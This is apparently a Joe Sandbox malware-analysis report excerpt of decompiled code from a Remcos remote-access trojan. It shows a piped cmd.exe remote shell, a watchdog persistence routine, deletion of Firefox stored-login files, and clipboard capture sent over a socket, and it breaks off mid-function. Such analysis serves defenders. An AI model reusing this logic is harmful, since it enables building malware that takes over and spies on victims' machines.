                    						_t143 = 0x473f78;
                    						goto L21;
                    					}
                    					if(_v64 <= _t97) {
                    						L17:
                    						E00402093(_t97,  &_v28, _t134, _t144, _t144);
                    						_t149 = _t149 - 0x18;
                    						_t105 = _t149;
                    						_push(_v60);
                    						_push(_t97);
                    						L18:
                    						E00405AAB(_t97, _t105, _t134, _t144, _t165);
                    						_t139 = E00404AA1(0x475c08, _t134, _t165, 0x62,  &_v28);
                    						E00401FD8();
                    						goto L19;
                    					}
                    					_t66 = E0043B720(_t144, E00401FAB( &_v52), _v64);
                    					_t149 = _t149 + 0xc;
                    					_t165 = _t66;
                    					if(_t66 != 0) {
                    						goto L17;
                    					}
                    					E00402093(_t97,  &_v28, _t134, _t144, _t144);
                    					_t149 = _t149 - 0x18;
                    					_t105 = _t149;
                    					_push(_v60 - _v68);
                    					_push(_v68);
                    					goto L18;
                    				} else {
                    					_t134 = "cmd.exe";
                    					_t98 = 0x473f78;
                    					_t70 = E00405B05("cmd.exe");
                    					_t156 = _t70;
                    					if(_t70 == 0) {
                    						L11:
                    						_t161 =  *0x471ae6 - _t97; // 0x0
                    						if(_t161 == 0) {
                    							L26:
                    							E00404E26(_t134);
                    							CloseHandle( *0x475c90);
                    							CloseHandle( *0x475cac);
                    							 *0x471ae6 = _t97;
                    							_t97 = 1;
                    							L27:
                    							E00401FD8();
                    							E00401FD8();
                    							return _t97;
                    						} else {
                    							goto L12;
                    						}
                    						do {
                    							goto L12;
                    							L21:
                    							_t38 =  <=  ? 0 :  *0x471ae7 & 0x000000ff;
                    							_t98 = _t143;
                    							 *0x471ae7 =  <=  ? 0 :  *0x471ae7 & 0x000000ff;
                    							if(E0040247C() == 0) {
                    								_v84 = _t97;
                    							} else {
                    								L0040537D(_t97, _t143, _t134, _t136, _t143, "\n");
                    								E00401FC0( &_v76, _t143);
                    								_t52 = E0040247C();
                    								WriteFile( *0x475c8c, E00401FAB(_t143), _t52,  &_v92, _t97);
                    								_t98 = _t143;
                    								L00405AA6(_t97, _t143, _t134, 0x465094);
                    							}
                    							Sleep(0x64);
                    							_t168 =  *0x471ae7 - _t97; // 0x0
                    						} while (_t168 != 0);
                    						TerminateProcess(0x475c94->hProcess, _t97);
                    						CloseHandle( *0x475c98);
                    						CloseHandle( *0x475c94);
                    						goto L26;
                    					}
                    					L00405AA6(_t97, 0x475cb0, "cmd.exe", E0043BA9A(_t97, _t156, "SystemDrive"));
                    					L0040537D(_t97, 0x475cb0, "cmd.exe", CloseHandle, 0x475cb0, "\\");
                    					0x475bb0->nLength = 0xc;
                    					 *0x475bb8 = 1;
                    					 *0x475bb4 = _t97;
                    					if(CreatePipe(0x475ca4, 0x475c8c, 0x475bb0, _t97) == 0 || CreatePipe(0x475c90, 0x475cac, 0x475bb0, _t97) == 0) {
                    						goto L27;
                    					} else {
                    						_t141 = 0x44;
                    						E004368A0(CloseHandle, 0x475bc0, _t97, CreatePipe);
                    						0x475bc0->cb = _t141;
                    						 *0x475bec = 0x101;
                    						 *0x475bf0 = 0;
                    						 *0x475bf8 =  *0x475ca4;
                    						_t79 =  *0x475cac;
                    						 *0x475bfc = _t79;
                    						 *0x475c00 = _t79;
                    						_t80 = E00401FAB(0x475cb0);
                    						_t143 = 0x473f78;
                    						 *0x471ae6 = CreateProcessA(_t97, E00401FAB(0x473f78), _t97, _t97, 1, _t97, _t97, _t80, 0x475bc0, 0x475c94) != 0;
                    						L00405AA6(_t97, 0x473f78, _t134, 0x465094);
                    						 *0x471ae7 = 1;
                    						E0040482D(0x475c08);
                    						E004048C8(0x475c08, 0x475c08, 0x475c08);
                    						_t149 = _t149 + 0xc - 0x18;
                    						E004020F6(_t97, _t149, _t134,  *0x471ae6,  &_v4);
                    						_push(0x93);
                    						_t98 = 0x475c08;
                    						_t139 = E00404AA1(0x475c08, _t134,  *0x471ae6);
                    						Sleep(0x12c);
                    						goto L11;
                    					}
                    				}
                    			}




































                    0x004056a0
                    0x004056a7
                    0x004056a9
                    0x004056b1
                    0x004056b9
                    0x004056c1
                    0x004056c7
                    0x004056cd
                    0x004056d5
                    0x004056df
                    0x004056e6
                    0x004056eb
                    0x004056cd
                    0x004056f7
                    0x004056ff
                    0x00405705
                    0x0040570b
                    0x00405712
                    0x0040571c
                    0x00405723
                    0x00405728
                    0x0040570b
                    0x00405729
                    0x0040572d
                    0x00405732
                    0x00405737
                    0x0040573d
                    0x00405741
                    0x00405747
                    0x004058a9
                    0x004058ae
                    0x004058bc
                    0x004058c6
                    0x00405977
                    0x00405981
                    0x00405986
                    0x00405992
                    0x00000000
                    0x00405992
                    0x004058cc
                    0x004058d0
                    0x004058d7
                    0x004058e9
                    0x004058f3
                    0x00405969
                    0x0040596a
                    0x00405970
                    0x00000000
                    0x00405970
                    0x004058f9
                    0x00405934
                    0x00405939
                    0x0040593e
                    0x00405941
                    0x00405943
                    0x00405947
                    0x00405948
                    0x0040594d
                    0x00405962
                    0x00405964
                    0x00000000
                    0x00405964
                    0x0040590a
                    0x0040590f
                    0x00405912
                    0x00405914
                    0x00000000
                    0x00000000
                    0x0040591b
                    0x00405928
                    0x0040592b
                    0x0040592d
                    0x0040592e
                    0x00000000
                    0x0040574d
                    0x0040574d
                    0x00405752
                    0x00405754
                    0x00405759
                    0x0040575b
                    0x0040589d
                    0x0040589d
                    0x004058a3
                    0x00405a2d
                    0x00405a32
                    0x00405a3d
                    0x00405a45
                    0x00405a47
                    0x00405a4d
                    0x00405a4f
                    0x00405a53
                    0x00405a5c
                    0x00405a6a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004058a9
                    0x00000000
                    0x00405994
                    0x0040599f
                    0x004059a2
                    0x004059a4
                    0x004059b0
                    0x004059f8
                    0x004059b2
                    0x004059b9
                    0x004059c3
                    0x004059d0
                    0x004059e4
                    0x004059ef
                    0x004059f1
                    0x004059f1
                    0x004059fe
                    0x00405a04
                    0x00405a04
                    0x00405a17
                    0x00405a23
                    0x00405a2b
                    0x00000000
                    0x00405a2b
                    0x00405774
                    0x00405780
                    0x0040579c
                    0x004057a6
                    0x004057b0
                    0x004057ba
                    0x00000000
                    0x004057d6
                    0x004057d8
                    0x004057e1
                    0x004057e9
                    0x004057f1
                    0x004057fb
                    0x00405810
                    0x00405815
                    0x0040581b
                    0x00405820
                    0x00405825
                    0x00405830
                    0x0040584e
                    0x00405855
                    0x0040585f
                    0x00405868
                    0x00405870
                    0x00405875
                    0x0040587f
                    0x00405884
                    0x00405889
                    0x00405895
                    0x00405897
                    0x00000000
                    0x00405897
                    0x004057ba

                    APIs
                    • __Init_thread_footer.LIBCMT ref: 004056E6
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    • __Init_thread_footer.LIBCMT ref: 00405723
                    • CreatePipe.KERNEL32(00475CA4,00475C8C,00475BB0,00000000,004650AC,00000000), ref: 004057B6
                    • CreatePipe.KERNEL32(00475C90,00475CAC,00475BB0,00000000), ref: 004057CC
                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475BC0,00475C94), ref: 0040583F
                    • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                    • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                    • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                      • Part of subcall function 0043418E: __onexit.LIBCMT ref: 00434194
                    • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F78,004650B0,00000062,00465094), ref: 004059E4
                    • Sleep.KERNEL32(00000064,00000062,00465094), ref: 004059FE
                    • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                    • CloseHandle.KERNEL32 ref: 00405A23
                    • CloseHandle.KERNEL32 ref: 00405A2B
                    • CloseHandle.KERNEL32 ref: 00405A3D
                    • CloseHandle.KERNEL32 ref: 00405A45
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                    • String ID: SystemDrive$cmd.exe$x?G$x?G$x?G
                    • API String ID: 2994406822-3292660590
                    • Opcode ID: 144c83940ff04e8167557b9a95151f3681fa13fe06734337fa0f6f4a10f63828
                    • Instruction ID: f6248a8d50c70e10269a62b3a8e56388fd228791c0a6db859e12820ee3931556
                    • Opcode Fuzzy Hash: 144c83940ff04e8167557b9a95151f3681fa13fe06734337fa0f6f4a10f63828
                    • Instruction Fuzzy Hash: 3391C271604B04AFD711BB66ED42A2F3A59EB84344F40443FF549AA2E2DFBC9C448A6D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E00411F00(void* __eflags) {
                    				char _v28;
                    				char _v36;
                    				void* _v40;
                    				char _v56;
                    				void* _v64;
                    				char _v76;
                    				void* _v84;
                    				char _v100;
                    				char _v108;
                    				char _v124;
                    				char _v128;
                    				char _v132;
                    				char _v136;
                    				char _v140;
                    				long _v144;
                    				char _v148;
                    				char _v156;
                    				char _v160;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				long _t41;
                    				CHAR* _t44;
                    				void* _t45;
                    				void* _t51;
                    				void* _t72;
                    				intOrPtr _t83;
                    				void* _t84;
                    				void* _t92;
                    				void* _t93;
                    				void* _t110;
                    				long _t158;
                    				int _t184;
                    				long _t186;
                    				void* _t187;
                    				char* _t189;
                    				void* _t190;
                    				void* _t192;
                    				signed int _t193;
                    				void* _t195;
                    				void* _t202;
                    
                    				_t195 = (_t193 & 0xfffffff8) - 0x8c;
                    				_push(_t187);
                    				_t41 = GetCurrentProcessId();
                    				_t178 = E00401FAB(0x4742d8);
                    				if(E00413425(0x4742d8, _t42, "WD", _t41) != 0) {
                    					_t44 = E00401FAB(0x474400);
                    					_t184 = 0;
                    					_t45 = OpenMutexA(0x100000, 0, _t44);
                    					__eflags = _t45;
                    					if(_t45 == 0) {
                    						E004020DF(0x4742d8,  &_v76);
                    						E00401F04(0x4742c0);
                    						E0041BF1A( &_v76);
                    						E00401F86(0x4742d8,  &_v100);
                    						__eflags = E0041BA4C( &_v100);
                    						if(__eflags != 0) {
                    							_t51 = E0040417E(0x4742d8,  &_v124,  &_v76, _t192, L"\\SysWOW64\\");
                    							_t180 = E0040417E(0x4742d8,  &_v56,  &_v76, _t192, E0043BA8F(0x4742d8,  &_v124, __eflags, L"WinDir"));
                    							E00401F13( &_v108, _t53, _t187, E00402FA5( &_v36, _t53, _t51));
                    							E00401F09();
                    							E00401F09();
                    						} else {
                    							_t93 = E0040417E(0x4742d8,  &_v28,  &_v76, _t192, L"\\system32\\");
                    							_t180 = E0040417E(0x4742d8,  &_v56,  &_v76, _t192, E0043BA8F(0x4742d8,  &_v28, __eflags, L"WinDir"));
                    							E00401F13( &_v108, _t95, _t187, E00402FA5( &_v132, _t95, _t93));
                    							E00401F09();
                    							E00401F09();
                    						}
                    						E00401F09();
                    						E0040C7BE( &_v136);
                    						E0040417E(0x4742d8,  &_v124, _t180, _t192, L"svchost.exe");
                    						E00412686(0x4742d8,  &_v140, _t192, __eflags,  &_v128);
                    						E00401F09();
                    						E0040417E(0x4742d8,  &_v132, _t180, _t192, L"rmclient.exe");
                    						E00412686(0x4742d8,  &_v148, _t192, __eflags,  &_v136);
                    						E00401F09();
                    						E0040417E(0x4742d8,  &_v140, _t180, _t192, L"fsutil.exe");
                    						E00412686(0x4742d8,  &_v156, _t192, __eflags,  &_v144);
                    						E00401F09();
                    						_t72 = E004021FA( &_v160);
                    						__eflags = _t72;
                    						if(_t72 != 0) {
                    							while(1) {
                    								_push(0x471d64);
                    								_t189 = E00401FAB( &_v76);
                    								_t83 = E00401F04(E00401E65( &_v136, _t180, _t192, __eflags, _t184));
                    								_t180 = _t189;
                    								_t84 = E00417B84(_t83, _t189);
                    								__eflags = _t84;
                    								if(_t84 != 0) {
                    									break;
                    								}
                    								_t184 = _t184 + 1;
                    								_t92 = E004021FA( &_v136);
                    								__eflags = _t184 - _t92;
                    								if(_t184 < _t92) {
                    									continue;
                    								}
                    								goto L11;
                    							}
                    							E00402093(0x4742d8, _t195 - 0x18, _t180, _t192, "Watchdog module activated");
                    							E00402093(0x4742d8, _t195, _t180, _t192, "i");
                    							E0041AF84(0x4742d8, _t184);
                    							Sleep(0x7d0);
                    							_t158 =  *0x471d6c; // 0x0
                    							goto L15;
                    						}
                    						L11:
                    						E00402093(0x4742d8, _t195 - 0x18, _t180, _t192, "Watchdog launch failed!");
                    						E00402093(0x4742d8, _t195, _t180, _t192, "E");
                    						E0041AF84(0x4742d8, _t184);
                    						CloseHandle( *0x471d74);
                    						E00406A03( &_v144);
                    						E00401F09();
                    						E00401FD8();
                    						_push(3);
                    						_pop(1);
                    					} else {
                    						CloseHandle(_t45);
                    						_t202 = _t195 - 0x18;
                    						E00402093(0x4742d8, _t202, _t178, _t192, "Remcos restarted by watchdog!");
                    						_t203 = _t202 - 0x18;
                    						E00402093(0x4742d8, _t202 - 0x18, _t178, _t192, "i");
                    						E0041AF84(0x4742d8, 0);
                    						E00402093(0x4742d8, _t203 + 0x18, _t178, _t192, "Watchdog module activated");
                    						E00402093(0x4742d8, _t203 + 0x18 - 0x18, _t178, _t192, "i");
                    						E0041AF84(0x4742d8, 0);
                    						CreateThread(0, 0, E004125F7, 0, 0, 0);
                    						_t189 = "WDH";
                    						_t110 = E004130F7(E00401FAB(0x4742d8), _t189,  &_v160);
                    						__eflags = _t110;
                    						if(_t110 == 0) {
                    							goto L1;
                    						} else {
                    							 *0x471d64 = OpenProcess(0x1fffff, 0, _v144);
                    							E00413557(E00401FAB(0x4742d8), __eflags, _t189);
                    							_t158 = _v144;
                    							L15:
                    							L16();
                    							asm("int3");
                    							_push(_t189);
                    							_push(_t184);
                    							_t186 = _t158;
                    							L17:
                    							_t190 = OpenProcess(0x100000, 0, _t186);
                    							WaitForSingleObject(_t190, 0xffffffff);
                    							CloseHandle(_t190);
                    							__eflags =  *0x471d4b;
                    							if(__eflags != 0) {
                    								E00411F00(__eflags, 0);
                    							}
                    							goto L17;
                    						}
                    						L19:
                    					}
                    				} else {
                    					L1:
                    				}
                    				return 1;
                    				goto L19;
                    			}













































                    0x00411f06
                    0x00411f0d
                    0x00411f0f
                    0x00411f27
                    0x00411f32
                    0x00411f41
                    0x00411f47
                    0x00411f4f
                    0x00411f55
                    0x00411f57
                    0x00411fe6
                    0x00411ff0
                    0x00411ffb
                    0x00412004
                    0x0041200e
                    0x00412010
                    0x00412073
                    0x0041208e
                    0x004120a2
                    0x004120ae
                    0x004120b7
                    0x00412012
                    0x0041201e
                    0x00412039
                    0x0041204a
                    0x00412053
                    0x0041205c
                    0x00412061
                    0x004120c0
                    0x004120c9
                    0x004120d7
                    0x004120e5
                    0x004120ee
                    0x004120fc
                    0x0041210a
                    0x00412113
                    0x00412121
                    0x0041212f
                    0x00412138
                    0x00412141
                    0x00412146
                    0x00412148
                    0x0041214a
                    0x0041214a
                    0x0041215d
                    0x00412166
                    0x0041216b
                    0x0041216f
                    0x00412175
                    0x00412177
                    0x00000000
                    0x00000000
                    0x0041217d
                    0x0041217e
                    0x00412183
                    0x00412185
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00412185
                    0x004121ea
                    0x004121f9
                    0x004121fe
                    0x0041220b
                    0x00412211
                    0x00000000
                    0x00412211
                    0x00412187
                    0x00412191
                    0x004121a0
                    0x004121a5
                    0x004121b3
                    0x004121bd
                    0x004121c6
                    0x004121cf
                    0x004121d4
                    0x004121d6
                    0x00411f5d
                    0x00411f5e
                    0x00411f64
                    0x00411f6e
                    0x00411f73
                    0x00411f7e
                    0x00411f83
                    0x00411f92
                    0x00411f9d
                    0x00411fa2
                    0x00411fb4
                    0x00411fbe
                    0x00411fce
                    0x00411fd5
                    0x00411fd7
                    0x00000000
                    0x00411fdd
                    0x0041222c
                    0x00412238
                    0x0041223e
                    0x00412242
                    0x00412242
                    0x00412247
                    0x00412248
                    0x00412249
                    0x0041224a
                    0x0041224c
                    0x0041225a
                    0x0041225f
                    0x00412266
                    0x0041226c
                    0x00412273
                    0x00412277
                    0x00412277
                    0x00000000
                    0x00412273
                    0x00000000
                    0x00411fd7
                    0x00411f34
                    0x00411f34
                    0x00411f36
                    0x004121dd
                    0x00000000

                    APIs
                    • GetCurrentProcessId.KERNEL32 ref: 00411F0F
                      • Part of subcall function 00413425: RegCreateKeyA.ADVAPI32(80000001,00000000,00465094), ref: 00413433
                      • Part of subcall function 00413425: RegSetValueExA.KERNEL32(00465094,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040BFC7,00465C30,00000001,000000AF,00465094), ref: 0041344E
                      • Part of subcall function 00413425: RegCloseKey.ADVAPI32(00465094,?,?,?,0040BFC7,00465C30,00000001,000000AF,00465094), ref: 00413459
                    • OpenMutexA.KERNEL32 ref: 00411F4F
                    • CloseHandle.KERNEL32(00000000), ref: 00411F5E
                    • CreateThread.KERNEL32 ref: 00411FB4
                    • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412223
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                    • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                    • API String ID: 3018269243-13974260
                    • Opcode ID: 0fd41f75aba0c7b531ca8027076ec2572596e903b6cd17f18c9c1f294c8b3206
                    • Instruction ID: e4664945f0e6eb5175d50489729f106b7e5a8041a511b506a05f3f34d0726fe3
                    • Opcode Fuzzy Hash: 0fd41f75aba0c7b531ca8027076ec2572596e903b6cd17f18c9c1f294c8b3206
                    • Instruction Fuzzy Hash: 1B719F316043016BC214FB72CD579AEB7A4AE90308F40057FF246A61E2EFBC9949C69F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 97%
                    			E0040B9A5(void* __ebx, void* __edx, void* __edi, void* __eflags) {
                    				char _v28;
                    				char _v52;
                    				char _v76;
                    				char _v100;
                    				char _v124;
                    				char _v148;
                    				struct _WIN32_FIND_DATAA _v468;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t41;
                    				signed int _t55;
                    				signed int _t57;
                    				int _t71;
                    				int _t73;
                    				void* _t132;
                    				void* _t133;
                    				void* _t134;
                    				void* _t135;
                    				void* _t136;
                    
                    				_t141 = __eflags;
                    				_t132 = __edi;
                    				_t86 = __ebx;
                    				E004020DF(__ebx,  &_v100);
                    				E004020DF(__ebx,  &_v76);
                    				E004020DF(__ebx,  &_v28);
                    				_t41 = E00402093(_t86,  &_v124, __edx, _t135, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
                    				E00401FE2( &_v28, _t42, _t133, E004052FD(_t86,  &_v52, E0043BA9A(_t86, __eflags, "UserProfile"), _t135, _t141, _t41));
                    				E00401FD8();
                    				E00401FD8();
                    				_t128 =  &_v28;
                    				_t134 = FindFirstFileA(E00401FAB(E00406B45( &_v124,  &_v28, _t135, "*")),  &_v468);
                    				E00401FD8();
                    				_t142 = _t134 - 0xffffffff;
                    				if(_t134 != 0xffffffff) {
                    					while(1) {
                    						__eflags = FindNextFileA(_t134,  &_v468);
                    						if(__eflags == 0) {
                    							break;
                    						}
                    						__eflags = _v468.dwFileAttributes & 0x00000010;
                    						if((_v468.dwFileAttributes & 0x00000010) != 0) {
                    							_t55 = E0043F6E0( &(_v468.cFileName), ".");
                    							__eflags = _t55;
                    							if(_t55 != 0) {
                    								_t57 = E0043F6E0( &(_v468.cFileName), "..");
                    								__eflags = _t57;
                    								if(_t57 != 0) {
                    									E00401FE2( &_v100, _t59, _t134, E00406383(_t86,  &_v52, E00406B45( &_v148,  &_v28, _t135,  &(_v468.cFileName)), _t132, _t135, __eflags, "\\logins.json"));
                    									E00401FD8();
                    									E00401FD8();
                    									_t128 = E00406B45( &_v52,  &_v28, _t135,  &(_v468.cFileName));
                    									E00401FE2( &_v76, _t65, _t134, E00406383(_t86,  &_v148, _t65, _t132, _t135, __eflags, "\\key3.db"));
                    									E00401FD8();
                    									E00401FD8();
                    									_t71 = DeleteFileA(E00401FAB( &_v100));
                    									__eflags = _t71;
                    									if(_t71 == 0) {
                    										GetLastError();
                    									}
                    									_t73 = DeleteFileA(E00401FAB( &_v76));
                    									__eflags = _t73;
                    									if(_t73 == 0) {
                    										GetLastError();
                    									}
                    								}
                    							}
                    						}
                    					}
                    					E00402093(_t86, _t136 - 0x18, _t128, _t135, "\n[Firefox StoredLogins Cleared!]");
                    					E0040C04D(_t86, _t128, _t135, __eflags);
                    					FindClose(_t134);
                    					goto L11;
                    				} else {
                    					FindClose(_t134);
                    					E00402093(_t86, _t136 - 0x18,  &_v28, _t135, "\n[Firefox StoredLogins not found]");
                    					E0040C04D(_t86,  &_v28, _t135, _t142);
                    					L11:
                    					E00401FD8();
                    					E00401FD8();
                    					E00401FD8();
                    					return 1;
                    				}
                    			}






















                    0x0040b9a5
                    0x0040b9a5
                    0x0040b9a5
                    0x0040b9b2
                    0x0040b9ba
                    0x0040b9c2
                    0x0040b9cf
                    0x0040b9ef
                    0x0040b9f7
                    0x0040b9ff
                    0x0040ba10
                    0x0040ba2d
                    0x0040ba2f
                    0x0040ba34
                    0x0040ba37
                    0x0040bb59
                    0x0040bb67
                    0x0040bb69
                    0x00000000
                    0x00000000
                    0x0040ba60
                    0x0040ba67
                    0x0040ba79
                    0x0040ba80
                    0x0040ba82
                    0x0040ba94
                    0x0040ba9b
                    0x0040ba9d
                    0x0040bacd
                    0x0040bad5
                    0x0040bae0
                    0x0040bafd
                    0x0040bb0f
                    0x0040bb1a
                    0x0040bb22
                    0x0040bb30
                    0x0040bb36
                    0x0040bb38
                    0x0040bb3a
                    0x0040bb3a
                    0x0040bb49
                    0x0040bb4f
                    0x0040bb51
                    0x0040bb53
                    0x0040bb53
                    0x0040bb51
                    0x0040ba9d
                    0x0040ba82
                    0x0040ba67
                    0x0040bb79
                    0x0040bb7e
                    0x0040bb87
                    0x00000000
                    0x0040ba3d
                    0x0040ba3e
                    0x0040ba4e
                    0x0040ba53
                    0x0040bb8d
                    0x0040bb90
                    0x0040bb98
                    0x0040bba0
                    0x0040bbab
                    0x0040bbab

                    APIs
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BA24
                    • FindClose.KERNEL32(00000000), ref: 0040BA3E
                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040BB61
                    • FindClose.KERNEL32(00000000), ref: 0040BB87
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$CloseFile$FirstNext
                    • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                    • API String ID: 1164774033-3681987949
                    • Opcode ID: fd818221c171ee764595b17188858096f06449168f67f89862993f10ea054c60
                    • Instruction ID: 50d97ef7dcd4553d1f64ff6a6a4febed0dfd47c1bce6f6587ea4593b929f0b80
                    • Opcode Fuzzy Hash: fd818221c171ee764595b17188858096f06449168f67f89862993f10ea054c60
                    • Instruction Fuzzy Hash: AB514E7190061A9BCB14F7A2DC56EEEB774AF10304F50017FF506B20E2EF786A498A9D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 90%
                    			E004164D7(void* __edx, void* __ebp, char _a8, char _a12, char _a16, char _a24, char _a28, void* _a152, void* _a176) {
                    				struct HWND__* __ebx;
                    				struct HWND__* _t16;
                    				void* _t22;
                    
                    				_t22 = __edx;
                    				if(OpenClipboard(_t16) != 0) {
                    					__eax = EmptyClipboard();
                    					__ecx =  &_a16;
                    					__ecx = E00401E65( &_a16, __edx, __ebp, __eflags, __ebx);
                    					__eax = E0040247C();
                    					__eax = __eax + 2;
                    					__edi = __eax;
                    					__eax = GlobalLock(__edi);
                    					__ecx =  &_a12;
                    					__esi = __eax;
                    					__ecx = E00401E65( &_a12, __edx, __ebp, __eflags, __ebx);
                    					__eax = E0040247C();
                    					__ecx =  &_a8;
                    					__ecx = E00401E65( &_a8, __edx, __ebp, __eflags, __ebx);
                    					GlobalUnlock(__edi) = SetClipboardData(0xd, __edi);
                    					__eax = CloseClipboard();
                    					__eax = OpenClipboard(__ebx);
                    					__eflags = __eax;
                    					if(__eax != 0) {
                    						__esi = GetClipboardData(0xd);
                    						__edi = GlobalLock(__esi);
                    						GlobalUnlock(__esi) = CloseClipboard();
                    						__eflags = __edi;
                    						0x46b928 =  !=  ? __edi : 0x46b928;
                    						__ecx =  &_a28;
                    						__eax = E0040417E(__ebx,  &_a28, __edx, __ebp,  !=  ? __edi : 0x46b928);
                    						__esp = __esp - 0x18;
                    						__edx =  &_a24;
                    						__ecx = __esp;
                    						__eax = E0041B7B3(__ebx, __esp, __edx);
                    						_push(0x6b);
                    						__ecx = 0x474580;
                    						__eax = E00404AA1(0x474580, __edx, __eflags);
                    						E00401F09();
                    					}
                    				}
                    				_t7 =  &_a16; // 0x404421
                    				E00401E8D(_t7, _t22);
                    				E00401FD8();
                    				E00401FD8();
                    				return 0;
                    			}






                    0x004164d7
                    0x004164e0
                    0x004164e6
                    0x004164ed
                    0x004164f6
                    0x004164f8
                    0x004164fd
                    0x0041650c
                    0x0041650f
                    0x00416516
                    0x0041651a
                    0x00416521
                    0x00416523
                    0x0041652a
                    0x00416533
                    0x0041654e
                    0x0041656b
                    0x00416572
                    0x00416578
                    0x0041657a
                    0x00416588
                    0x00416592
                    0x0041659a
                    0x004165a0
                    0x004165a7
                    0x004165ab
                    0x004165af
                    0x004165b4
                    0x004165b7
                    0x004165bb
                    0x004165bd
                    0x004165c2
                    0x004165c4
                    0x004165c9
                    0x00415b00
                    0x00415b00
                    0x0041657a
                    0x00416b20
                    0x00416b24
                    0x00416b30
                    0x00416b3c
                    0x00416b49

                    APIs
                    • OpenClipboard.USER32 ref: 004164D8
                    • EmptyClipboard.USER32 ref: 004164E6
                    • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 00416506
                    • GlobalLock.KERNEL32 ref: 0041650F
                    • GlobalUnlock.KERNEL32(00000000), ref: 00416545
                    • SetClipboardData.USER32 ref: 0041654E
                    • CloseClipboard.USER32 ref: 0041656B
                    • OpenClipboard.USER32 ref: 00416572
                    • GetClipboardData.USER32 ref: 00416582
                    • GlobalLock.KERNEL32 ref: 0041658B
                    • GlobalUnlock.KERNEL32(00000000), ref: 00416594
                    • CloseClipboard.USER32 ref: 0041659A
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                    • String ID: !D@
                    • API String ID: 3520204547-604454484
                    • Opcode ID: 1bfc938c798a234b4ac0364e1dc0df78a67ef2c686dad58a89e6ca08c0a9fdd5
                    • Instruction ID: d0c59d282e62dd9e995b64ee624be3bbbf6bc4ac73e754e67e676b3e72119a1f
                    • Opcode Fuzzy Hash: 1bfc938c798a234b4ac0364e1dc0df78a67ef2c686dad58a89e6ca08c0a9fdd5
                    • Instruction Fuzzy Hash: 832135716043005BD714BB71DC5AABE36A9AF94746F40043EF906E21E2EF38D945C76A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 92%
                    			E0040BBAC(void* __edx, void* __edi, void* __eflags) {
                    				char _v28;
                    				char _v52;
                    				char _v76;
                    				char _v100;
                    				char _v124;
                    				struct _WIN32_FIND_DATAA _v444;
                    				void* __ebx;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t30;
                    				signed int _t44;
                    				signed int _t46;
                    				long _t60;
                    				void* _t68;
                    				void* _t69;
                    				void* _t98;
                    				void* _t103;
                    				void* _t104;
                    				void* _t105;
                    				void* _t106;
